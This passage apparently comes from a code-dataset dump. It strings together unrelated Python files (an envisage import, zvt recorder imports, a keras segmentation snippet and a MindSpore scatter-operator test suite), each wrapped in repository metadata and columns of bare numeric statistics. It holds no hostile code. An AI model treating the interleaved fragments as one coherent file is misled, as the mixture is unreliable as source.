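matches = collection.find_files_by_script(script, timeout_in_seconds=3)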
| 42.084507
| 125
| 0.650602
| 2,950
| 23,904
| 4.969153
| 0.056271
| 0.023399
| 0.040112
| 0.031926
| 0.871615
| 0.85306
| 0.833481
| 0.821543
| 0.814653
| 0.807422
| 0
| 0.024492
| 0.217704
| 23,904
| 567
| 126
| 42.15873
| 0.759412
| 0.003556
| 0
| 0.627566
| 0
| 0
| 0.078469
| 0.025772
| 0
| 0
| 0
| 0
| 0.222874
| 1
| 0.073314
| false
| 0
| 0.032258
| 0
| 0.108504
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9b5316477ce7fd6da19f6364699eb3e0afb2374d
| 87
|
py
|
Python
|
envisage/plugins/ipython_kernel/api.py
|
janvonrickenbach/Envisage_wxPhoenix_py3
|
cf79e5b2a0c3b46898a60b5fe5a2fb580604808b
|
[
"BSD-3-Clause"
] | null | null | null |
envisage/plugins/ipython_kernel/api.py
|
janvonrickenbach/Envisage_wxPhoenix_py3
|
cf79e5b2a0c3b46898a60b5fe5a2fb580604808b
|
[
"BSD-3-Clause"
] | 1
|
2017-05-22T21:15:22.000Z
|
2017-05-22T21:15:22.000Z
|
envisage/plugins/ipython_kernel/api.py
|
janvonrickenbach/Envisage_wxPhoenix_py3
|
cf79e5b2a0c3b46898a60b5fe5a2fb580604808b
|
[
"BSD-3-Clause"
] | 1
|
2019-10-01T07:03:58.000Z
|
2019-10-01T07:03:58.000Z
|
from ipython_kernel_plugin import IPythonKernelPlugin, IPYTHON_KERNEL_PROTOCOL # noqa
| 43.5
| 86
| 0.885057
| 10
| 87
| 7.3
| 0.8
| 0.356164
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091954
| 87
| 1
| 87
| 87
| 0.924051
| 0.045977
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
9b601d1541c40d95e59c43221fab5f52ddc75afd
| 231
|
py
|
Python
|
zvt/recorders/joinquant/overall/__init__.py
|
Evergreen2020/zvt
|
446a2512d716a38a12164b6d4468a6c9de01b986
|
[
"MIT"
] | 6
|
2020-09-03T10:02:00.000Z
|
2021-02-04T02:51:47.000Z
|
zvt/recorders/joinquant/overall/__init__.py
|
Evergreen2020/zvt
|
446a2512d716a38a12164b6d4468a6c9de01b986
|
[
"MIT"
] | 2
|
2019-12-20T13:12:30.000Z
|
2020-01-03T06:24:30.000Z
|
zvt/recorders/joinquant/overall/__init__.py
|
Evergreen2020/zvt
|
446a2512d716a38a12164b6d4468a6c9de01b986
|
[
"MIT"
] | 2
|
2020-07-08T04:15:40.000Z
|
2021-06-08T08:51:31.000Z
|
# -*- coding: utf-8 -*-
from zvt.recorders.joinquant.overall.cross_market_recorder import *
from zvt.recorders.joinquant.overall.margin_trading_recorder import *
from zvt.recorders.joinquant.overall.stock_summary_recorder import *
| 46.2
| 69
| 0.822511
| 30
| 231
| 6.133333
| 0.533333
| 0.11413
| 0.26087
| 0.407609
| 0.673913
| 0.5
| 0.5
| 0
| 0
| 0
| 0
| 0.004673
| 0.073593
| 231
| 4
| 70
| 57.75
| 0.85514
| 0.090909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
32e9f9206385a627a8ad3b33526b3f3d199fd0d3
| 78
|
py
|
Python
|
practice.py
|
dajimmy1120/AvatarGAN
|
be264914223490ee9c23e59ad5a414da1aef4824
|
[
"Apache-2.0"
] | null | null | null |
practice.py
|
dajimmy1120/AvatarGAN
|
be264914223490ee9c23e59ad5a414da1aef4824
|
[
"Apache-2.0"
] | null | null | null |
practice.py
|
dajimmy1120/AvatarGAN
|
be264914223490ee9c23e59ad5a414da1aef4824
|
[
"Apache-2.0"
] | null | null | null |
from keras_segmentation.pretrained import pspnet_101_voc12
pspnet_101_voc12()
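The call above downloads the pretrained PSPNet-101 (Pascal VOC 2012) model and immediately discards it. A hedged sketch of the usual next step with keras_segmentation; the file names are placeholders:

# Sketch only: keep the returned model and run inference with it.
from keras_segmentation.pretrained import pspnet_101_voc12

model = pspnet_101_voc12()  # fetches pretrained weights on first call
out = model.predict_segmentation(
    inp="input.jpg",         # placeholder input image
    out_fname="output.png",  # placeholder path for the colorized mask
)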
| 26
| 58
| 0.897436
| 11
| 78
| 5.909091
| 0.727273
| 0.276923
| 0.430769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136986
| 0.064103
| 78
| 3
| 59
| 26
| 0.753425
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
fd04dad88b99035b710b66d225ec5a6739f0249b
| 25,604
|
py
|
Python
|
tests/st/ops/cpu/test_scatter_arithmetic_op.py
|
PowerOlive/mindspore
|
bda20724a94113cedd12c3ed9083141012da1f15
|
[
"Apache-2.0"
] | 3,200
|
2020-02-17T12:45:41.000Z
|
2022-03-31T20:21:16.000Z
|
tests/st/ops/cpu/test_scatter_arithmetic_op.py
|
zimo-geek/mindspore
|
665ec683d4af85c71b2a1f0d6829356f2bc0e1ff
|
[
"Apache-2.0"
] | 176
|
2020-02-12T02:52:11.000Z
|
2022-03-28T22:15:55.000Z
|
tests/st/ops/cpu/test_scatter_arithmetic_op.py
|
zimo-geek/mindspore
|
665ec683d4af85c71b2a1f0d6829356f2bc0e1ff
|
[
"Apache-2.0"
] | 621
|
2020-03-09T01:31:41.000Z
|
2022-03-30T03:43:19.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import pytest
import mindspore.context as context
import mindspore.nn as nn
from mindspore import Tensor, Parameter
from mindspore.ops import operations as P
context.set_context(mode=context.GRAPH_MODE, device_target="CPU")
class TestScatterAddNet(nn.Cell):
def __init__(self, lock, inputx, indices, updates):
super(TestScatterAddNet, self).__init__()
self.scatter_add = P.ScatterAdd(use_locking=lock)
self.inputx = Parameter(inputx, name="inputx")
self.indices = Parameter(indices, name="indices")
self.updates = Parameter(updates, name="updates")
def construct(self):
out = self.scatter_add(self.inputx, self.indices, self.updates)
return out
def scatter_add_net(inputx, indices, updates):
lock = True
net = TestScatterAddNet(lock, inputx, indices, updates)
return net()
def scatter_add_use_locking_false_net(inputx, indices, updates):
lock = False
net = TestScatterAddNet(lock, inputx, indices, updates)
return net()
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_small_float32():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_add_net(inputx, indices, updates)
expected = np.array([[6., 8., 10.],
[12., 14., 16.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_input_updated():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
lock = True
net = TestScatterAddNet(lock, inputx, indices, updates)
net()
expected = np.array([[6., 8., 10.],
[12., 14., 16.]])
np.testing.assert_array_almost_equal(net.inputx.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_large_shape_float32():
inputx = Tensor(np.ones((4, 2, 3, 4)).astype(np.float32))
indices = Tensor(np.array([[0, 2], [3, 1]]).astype(np.int32))
updates = Tensor(np.arange(96).reshape((2, 2, 2, 3, 4)).astype(np.float32))
output = scatter_add_net(inputx, indices, updates)
expected = np.array([[[[1., 2., 3., 4.],
[5., 6., 7., 8.],
[9., 10., 11., 12.]],
[[13., 14., 15., 16.],
[17., 18., 19., 20.],
[21., 22., 23., 24.]]],
[[[73., 74., 75., 76.],
[77., 78., 79., 80.],
[81., 82., 83., 84.]],
[[85., 86., 87., 88.],
[89., 90., 91., 92.],
[93., 94., 95., 96.]]],
[[[25., 26., 27., 28.],
[29., 30., 31., 32.],
[33., 34., 35., 36.]],
[[37., 38., 39., 40.],
[41., 42., 43., 44.],
[45., 46., 47., 48.]]],
[[[49., 50., 51., 52.],
[53., 54., 55., 56.],
[57., 58., 59., 60.]],
[[61., 62., 63., 64.],
[65., 66., 67., 68.],
[69., 70., 71., 72.]]]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_small_float32_use_locking_false():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([1, 0]).astype(np.int32))
updates = Tensor(np.arange(6).reshape((2, 3)).astype(np.float32))
output = scatter_add_use_locking_false_net(inputx, indices, updates)
expected = np.array([[3., 4., 5.],
[0., 1., 2.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_input_less_than_1_float32():
inputx = Tensor(np.array([[0.214141, 0.415151, 0.51516],
[0.876542, 0.451611, 0.55112],
[0.111244, 0.633333, 0.34444]]).astype(np.float32))
indices = Tensor(np.array([[[1, 0, 2],
[2, 2, 0]],
[[1, 0, 1],
[2, 1, 2]]]).astype(np.int32))
updates = Tensor(np.arange(34, 70).reshape((2, 2, 3, 3)).astype(np.float32))
output = scatter_add_net(inputx, indices, updates)
expected = np.array([[141.21414, 144.41515, 147.51517],
[208.87654, 212.45161, 216.55112],
[257.11124, 262.63333, 267.34442]], dtype=np.float32)
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_float16():
inputx = Tensor(np.zeros((2, 3)).astype(np.float16))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float16))
output = scatter_add_net(inputx, indices, updates)
expected = np.array([[6., 8., 10.],
[12., 14., 16.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_large_float16():
inputx = Tensor(np.zeros((2, 3, 4)).astype(np.float16))
indices = Tensor(np.array([[0, 0], [1, 1]]).astype(np.int32))
updates = Tensor(np.arange(63, 111).reshape((2, 2, 3, 4)).astype(np.float16))
output = scatter_add_net(inputx, indices, updates)
expected = np.array([[[138., 140., 142., 144.],
[146., 148., 150., 152.],
[154., 156., 158., 160.]],
[[186., 188., 190., 192.],
[194., 196., 198., 200.],
[202., 204., 206., 208.]]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_disordered_float16():
inputx = Tensor(np.flip(np.arange(34, 46).reshape(3, 4).astype(np.float16)))
indices = Tensor(np.array([[[0, 1, 2],
[2, 1, 0]],
[[0, 0, 0],
[2, 2, 2]]]).astype(np.int32))
updates = Tensor(np.arange(63, 111).reshape((2, 2, 3, 4)).astype(np.float16))
output = scatter_add_net(inputx, indices, updates)
expected = np.array([[464., 468., 472., 476.],
[187., 188., 189., 190.],
[492., 496., 500., 504.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_large_int32():
inputx = Tensor(np.zeros((2, 3, 4)).astype(np.int32))
indices = Tensor(np.array([[0, 0], [1, 1]]).astype(np.int32))
updates = Tensor(np.arange(63, 111).reshape((2, 2, 3, 4)).astype(np.int32))
output = scatter_add_net(inputx, indices, updates)
expected = np.array([[[138., 140., 142., 144.],
[146., 148., 150., 152.],
[154., 156., 158., 160.]],
[[186., 188., 190., 192.],
[194., 196., 198., 200.],
[202., 204., 206., 208.]]]).astype(np.int32)
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_add_disordered_int32():
inputx = Tensor(np.flip(np.arange(34, 46).reshape(3, 4).astype(np.int32)))
indices = Tensor(np.array([[[0, 1, 2],
[2, 1, 0]],
[[0, 0, 0],
[2, 2, 2]]]).astype(np.int32))
updates = Tensor(np.arange(63, 111).reshape((2, 2, 3, 4)).astype(np.int32))
output = scatter_add_net(inputx, indices, updates)
expected = np.array([[464., 468., 472., 476.],
[187., 188., 189., 190.],
[492., 496., 500., 504.]]).astype(np.int32)
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
class TestScatterSubNet(nn.Cell):
def __init__(self, lock, inputx, indices, updates):
super(TestScatterSubNet, self).__init__()
self.scatter_sub = P.ScatterSub(use_locking=lock)
self.inputx = Parameter(inputx, name="inputx")
self.indices = Parameter(indices, name="indices")
self.updates = Parameter(updates, name="updates")
def construct(self):
out = self.scatter_sub(self.inputx, self.indices, self.updates)
return out
def scatter_sub_net(inputx, indices, updates):
lock = True
net = TestScatterSubNet(lock, inputx, indices, updates)
return net()
def scatter_sub_use_locking_false_net(inputx, indices, updates):
lock = False
net = TestScatterSubNet(lock, inputx, indices, updates)
return net()
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_sub_input_updated():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
lock = True
net = TestScatterSubNet(lock, inputx, indices, updates)
net()
expected = np.array([[-6., -8., -10.],
[-12., -14., -16.]])
np.testing.assert_array_almost_equal(net.inputx.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_sub_large_shape_float32():
inputx = Tensor(np.ones((4, 2, 3, 4)).astype(np.float32))
indices = Tensor(np.array([[0, 2], [3, 1]]).astype(np.int32))
updates = Tensor(np.arange(96).reshape((2, 2, 2, 3, 4)).astype(np.float32))
output = scatter_sub_net(inputx, indices, updates)
expected = np.array(
[[[[1.0, 0.0, -1.0, -2.0],
[-3.0, -4.0, -5.0, -6.0],
[-7.0, -8.0, -9.0, -10.0]],
[[-11.0, -12.0, -13.0, -14.0],
[-15.0, -16.0, -17.0, -18.0],
[-19.0, -20.0, -21.0, -22.0]]],
[[[-71.0, -72.0, -73.0, -74.0],
[-75.0, -76.0, -77.0, -78.0],
[-79.0, -80.0, -81.0, -82.0]],
[[-83.0, -84.0, -85.0, -86.0],
[-87.0, -88.0, -89.0, -90.0],
[-91.0, -92.0, -93.0, -94.0]]],
[[[-23.0, -24.0, -25.0, -26.0],
[-27.0, -28.0, -29.0, -30.0],
[-31.0, -32.0, -33.0, -34.0]],
[[-35.0, -36.0, -37.0, -38.0],
[-39.0, -40.0, -41.0, -42.0],
[-43.0, -44.0, -45.0, -46.0]]],
[[[-47.0, -48.0, -49.0, -50.0],
[-51.0, -52.0, -53.0, -54.0],
[-55.0, -56.0, -57.0, -58.0]],
[[-59.0, -60.0, -61.0, -62.0],
[-63.0, -64.0, -65.0, -66.0],
[-67.0, -68.0, -69.0, -70.0]]]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_sub_small_float32_use_locking_false():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([1, 0]).astype(np.int32))
updates = Tensor(np.arange(6).reshape((2, 3)).astype(np.float32))
output = scatter_sub_use_locking_false_net(inputx, indices, updates)
expected = np.array([[-3., -4., -5.],
[-0., -1., -2.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
class TestScatterMulNet(nn.Cell):
def __init__(self, lock, inputx, indices, updates):
super(TestScatterMulNet, self).__init__()
self.scatter_mul = P.ScatterMul(use_locking=lock)
self.inputx = Parameter(inputx, name="inputx")
self.indices = Parameter(indices, name="indices")
self.updates = Parameter(updates, name="updates")
def construct(self):
out = self.scatter_mul(self.inputx, self.indices, self.updates)
return out
def scatter_mul_net(inputx, indices, updates):
lock = True
net = TestScatterMulNet(lock, inputx, indices, updates)
return net()
def scatter_mul_use_locking_false_net(inputx, indices, updates):
lock = False
net = TestScatterMulNet(lock, inputx, indices, updates)
return net()
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_mul_input_updated():
inputx = Tensor(np.ones((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
lock = True
net = TestScatterMulNet(lock, inputx, indices, updates)
net()
expected = np.array([[0., 7., 16.],
[27., 40., 55.]])
np.testing.assert_array_almost_equal(net.inputx.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_mul_output_updated_float32():
inputx = Tensor(np.ones((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_mul_net(inputx, indices, updates)
expected = np.array([[0., 7., 16.],
[27., 40., 55.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_mul_small_float32_use_locking_false():
inputx = Tensor(np.ones((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_mul_use_locking_false_net(inputx, indices, updates)
expected = np.array([[0., 7., 16.],
[27., 40., 55.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
class TestScatterDivNet(nn.Cell):
def __init__(self, lock, inputx, indices, updates):
super(TestScatterDivNet, self).__init__()
self.scatter_div = P.ScatterDiv(use_locking=lock)
self.inputx = Parameter(inputx, name="inputx")
self.indices = Parameter(indices, name="indices")
self.updates = Parameter(updates, name="updates")
def construct(self):
out = self.scatter_div(self.inputx, self.indices, self.updates)
return out
def scatter_div_net(inputx, indices, updates):
lock = True
net = TestScatterDivNet(lock, inputx, indices, updates)
return net()
def scatter_div_use_locking_false_net(inputx, indices, updates):
lock = False
net = TestScatterDivNet(lock, inputx, indices, updates)
return net()
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_div_input_updated():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(1, 13).reshape((2, 2, 3)).astype(np.float32))
lock = True
net = TestScatterDivNet(lock, inputx, indices, updates)
net()
expected = np.array([[0., 0., 0.],
[0., 0., 0.]])
np.testing.assert_array_almost_equal(net.inputx.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_div_output_updated_float32():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(1, 13).reshape((2, 2, 3)).astype(np.float32))
output = scatter_div_net(inputx, indices, updates)
expected = np.array([[0., 0., 0.],
[0., 0., 0.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_div_small_float32_use_locking_false():
inputx = Tensor(np.ones((2, 3)).astype(np.float32) * 10)
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.ones(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_div_use_locking_false_net(inputx, indices, updates)
expected = np.array([[10., 10., 10.],
[10., 10., 10.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
class TestScatterMaxNet(nn.Cell):
def __init__(self, lock, inputx, indices, updates):
super(TestScatterMaxNet, self).__init__()
self.scatter_max = P.ScatterMax(use_locking=lock)
self.inputx = Parameter(inputx, name="inputx")
self.indices = Parameter(indices, name="indices")
self.updates = Parameter(updates, name="updates")
def construct(self):
out = self.scatter_max(self.inputx, self.indices, self.updates)
return out
def scatter_max_net(inputx, indices, updates):
lock = True
net = TestScatterMaxNet(lock, inputx, indices, updates)
return net()
def scatter_max_use_locking_false_net(inputx, indices, updates):
lock = False
net = TestScatterMaxNet(lock, inputx, indices, updates)
return net()
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_max_input_updated():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
lock = True
net = TestScatterMaxNet(lock, inputx, indices, updates)
net()
expected = np.array([[6., 7., 8.],
[9., 10., 11.]])
np.testing.assert_array_almost_equal(net.inputx.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_max_output_updated_float32():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_max_net(inputx, indices, updates)
expected = np.array([[6., 7., 8.],
[9., 10., 11.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_max_small_float32_use_locking_false():
inputx = Tensor(np.ones((2, 3)).astype(np.float32) * 10)
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_max_use_locking_false_net(inputx, indices, updates)
expected = np.array([[10., 10., 10.],
[10., 10., 11.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
class TestScatterMinNet(nn.Cell):
def __init__(self, lock, inputx, indices, updates):
super(TestScatterMinNet, self).__init__()
self.scatter_min = P.ScatterMin(use_locking=lock)
self.inputx = Parameter(inputx, name="inputx")
self.indices = Parameter(indices, name="indices")
self.updates = Parameter(updates, name="updates")
def construct(self):
out = self.scatter_min(self.inputx, self.indices, self.updates)
return out
def scatter_min_net(inputx, indices, updates):
lock = True
net = TestScatterMinNet(lock, inputx, indices, updates)
return net()
def scatter_min_use_locking_false_net(inputx, indices, updates):
lock = False
net = TestScatterMinNet(lock, inputx, indices, updates)
return net()
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_min_input_updated():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
lock = True
net = TestScatterMinNet(lock, inputx, indices, updates)
net()
expected = np.array([[0., 0., 0.],
[0., 0., 0.]])
np.testing.assert_array_almost_equal(net.inputx.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_min_output_updated_float32():
inputx = Tensor(np.ones((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_min_net(inputx, indices, updates)
expected = np.array([[0., 1., 1.],
[1., 1., 1.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_min_small_float32_use_locking_false():
inputx = Tensor(np.ones((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_min_use_locking_false_net(inputx, indices, updates)
expected = np.array([[0., 1., 1.],
[1., 1., 1.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
class TestScatterUpdateNet(nn.Cell):
def __init__(self, lock, inputx, indices, updates):
super(TestScatterUpdateNet, self).__init__()
self.scatter_update = P.ScatterUpdate(use_locking=lock)
self.inputx = Parameter(inputx, name="inputx")
self.indices = Parameter(indices, name="indices")
self.updates = Parameter(updates, name="updates")
def construct(self):
out = self.scatter_update(self.inputx, self.indices, self.updates)
return out
def scatter_update_net(inputx, indices, updates):
lock = True
net = TestScatterUpdateNet(lock, inputx, indices, updates)
return net()
def scatter_update_use_locking_false_net(inputx, indices, updates):
lock = False
net = TestScatterUpdateNet(lock, inputx, indices, updates)
return net()
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_update_input_updated():
inputx = Tensor(np.zeros((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
lock = True
net = TestScatterUpdateNet(lock, inputx, indices, updates)
net()
expected = np.array([[6., 7., 8.],
[9., 10., 11.]])
np.testing.assert_array_almost_equal(net.inputx.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_update_output_updated_float32():
inputx = Tensor(np.ones((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_update_net(inputx, indices, updates)
expected = np.array([[6., 7., 8.],
[9., 10., 11.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
@pytest.mark.level0
@pytest.mark.platform_x86_cpu
@pytest.mark.env_onecard
def test_scatter_update_small_float32_use_locking_false():
inputx = Tensor(np.ones((2, 3)).astype(np.float32))
indices = Tensor(np.array([[0, 1], [0, 1]]).astype(np.int32))
updates = Tensor(np.arange(12).reshape((2, 2, 3)).astype(np.float32))
output = scatter_update_use_locking_false_net(inputx, indices, updates)
expected = np.array([[6., 7., 8.],
[9., 10., 11.]])
np.testing.assert_array_almost_equal(output.asnumpy(), expected)
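As a plain-NumPy cross-check of the ScatterAdd semantics these tests pin down (a sketch, not MindSpore API): np.add.at performs the same unbuffered accumulation into the rows selected by `indices`, and reproduces the first expected array in the file.

# NumPy reference for test_scatter_add_small_float32 above (sketch only).
import numpy as np

inputx = np.zeros((2, 3), dtype=np.float32)
indices = np.array([[0, 1], [0, 1]], dtype=np.int32)
updates = np.arange(12).reshape((2, 2, 3)).astype(np.float32)
np.add.at(inputx, indices, updates)  # rows 0 and 1 each accumulate twice
assert np.allclose(inputx, [[6., 8., 10.], [12., 14., 16.]])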
| 39.757764
| 82
| 0.594712
| 3,366
| 25,604
| 4.374629
| 0.092395
| 0.046723
| 0.085569
| 0.028523
| 0.875314
| 0.874363
| 0.871986
| 0.860102
| 0.804822
| 0.791375
| 0
| 0.085047
| 0.238596
| 25,604
| 643
| 83
| 39.819596
| 0.670274
| 0.024918
| 0
| 0.676245
| 0
| 0
| 0.005883
| 0
| 0
| 0
| 0
| 0
| 0.05364
| 1
| 0.10728
| false
| 0
| 0.011494
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fd5095688e3adf6f9ca25f40240ff9d7e4246e41
| 153
|
py
|
Python
|
moto/sts/__init__.py
|
